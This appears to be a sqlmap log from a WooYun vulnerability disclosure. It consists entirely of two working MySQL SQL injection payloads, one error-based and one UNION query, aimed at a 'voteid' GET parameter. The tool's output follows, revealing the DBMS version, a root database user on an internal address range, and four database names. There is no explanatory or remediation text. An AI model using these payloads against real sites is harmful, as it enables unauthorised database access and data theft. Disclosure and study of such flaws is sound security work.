WooYun.org

Parameter: voteid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: voteid=56 AND (SELECT 6123 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6123=6123,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: voteid=56 UNION ALL SELECT CONCAT(0x717a717071,0x726b426b43614a6f724a,0x7162716b71)#
---
[10:03:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:03:01] [INFO] fetching database users
database management system users [1]:
[*] 'root'@'192.168.50.%'
[10:03:01] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] linkstat
[*] new_plugin
[*] test